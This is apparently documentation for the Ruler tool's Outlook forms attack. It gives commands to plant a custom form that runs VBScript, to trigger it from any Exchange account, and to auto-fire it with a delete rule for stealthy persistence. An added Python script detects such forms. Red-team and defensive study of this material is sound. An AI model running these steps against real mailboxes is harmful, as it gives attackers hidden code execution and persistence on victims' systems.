Forms
Ruler can also get a shell through custom forms. This is especially useful for persistence, as a form can lie dormant in the inbox, nearly undetectable.
The basic premise behind forms is explained in Outlook forms and shells.
To access the Forms option, you need to use the form command. There are multiple sub-commands to forms:
If you use the forms attack, you need to ensure that the templates folder is present in the current working directory. Ruler will need the files contained in this directory. Please copy the following files into it:
- img0.bin
- img1.bin
- formstemplate.bin
- formsdeletetemplate.bin
You can view all existing forms using the display command. This fetches the list of existing forms from the Exchange server and provides you with the full form name.
./ruler --email john@msf.com form display
Unlike Rules, forms don't require a WebDAV instance, and VBScript can be executed directly. A sample VBScript entry would be:
CreateObject("Wscript.Shell").Run "calc.exe", 0, False
The script needs to be supplied in either a file, or on the command line. To create a custom form:
./ruler --email john@msf.com form add --suffix superduper --input /tmp/command.txt --send
This will create a new form of message class IPM.Note.superduper and use the script found in /tmp/command.txt as the VBScript to execute. Using --send simply tasks Ruler with sending an email to the user, using their own account, and ensuring the correct message class is set (which triggers the form).
To trigger an existing form, you don't need to send the email from the account that the form was created on. This is great for persistence: you simply need to have a valid Exchange-based account (outlook.com is great) and know the suffix used for the form.
./ruler --email alice@outlook.com form send --target john@msf.com --suffix superduper
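Because the trigger is nothing more than a message whose class is IPM.Note.<suffix>, a defender can hunt for non-standard IPM.Note subclasses in mailbox or transport exports. The following is an added example, not part of Ruler or its documentation; the allowlist of ordinary note classes and the sample rows are assumptions constructed for illustration.

```python
import re

# Illustrative allowlist of message classes that ordinary mail uses (an
# assumption; extend it for the classes that are legitimate in your tenant).
KNOWN_NOTE_CLASSES = {
    "ipm.note",
    "ipm.note.smime",
    "ipm.note.smime.multipartsigned",
}


def custom_form_suffix(message_class):
    """Return the suffix if message_class looks like a custom IPM.Note.<suffix>
    form trigger, otherwise None. Matching is case-insensitive because
    Exchange message classes are."""
    cls = message_class.strip()
    if cls.lower() in KNOWN_NOTE_CLASSES:
        return None
    m = re.fullmatch(r"IPM\.Note\.(.+)", cls, re.IGNORECASE)
    return m.group(1) if m else None


def flag_messages(messages):
    """messages: iterable of dicts with 'sender' and 'message_class' keys,
    e.g. rows exported from a mailbox. Returns the rows that carry a
    custom IPM.Note subclass, annotated with the suffix to look up in the
    mailbox's form list (compare against what 'form display' reports)."""
    flagged = []
    for msg in messages:
        suffix = custom_form_suffix(msg["message_class"])
        if suffix is not None:
            flagged.append({**msg, "suffix": suffix})
    return flagged


# Constructed sample rows, not real data.
SAMPLE = [
    {"sender": "alice@outlook.com", "message_class": "IPM.Note.superduper"},
    {"sender": "bob@msf.com", "message_class": "IPM.Note"},
    {"sender": "carol@msf.com", "message_class": "ipm.note.SMIME"},
    {"sender": "dave@msf.com", "message_class": "IPM.Appointment"},
]

if __name__ == "__main__":
    for hit in flag_messages(SAMPLE):
        print(hit["sender"], "->", hit["message_class"], "(suffix:", hit["suffix"] + ")")
```

A hit is worth pairing with the mailbox's form list and any client-side rule that deletes messages of that class on arrival, since that combination is what makes the trigger fire without user interaction.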
Nick Landers (@monoxgas) found that a form without event triggers would call the VBScript payload on delete. This delete can be automated by creating a client-side rule to delete the message as it arrives in the mailbox.
This is a great way to auto-trigger the form without requiring any user interaction. Ruler can automate this for you if you supply the --rule flag:
./ruler --email john@msf.com form add --suffix superduper --input /tmp/command.txt --rule --send
You will need to delete the newly created rule once your payload has triggered. This can be done using the delete command outlined under Rules.
Deleting an existing form is done in a similar way to deleting rules.
./ruler --email john@msf.com form delete --suffix superduper
If the form has a rule associated with it (you used --rule when creating the form), Ruler will detect the rule and offer to delete it for you.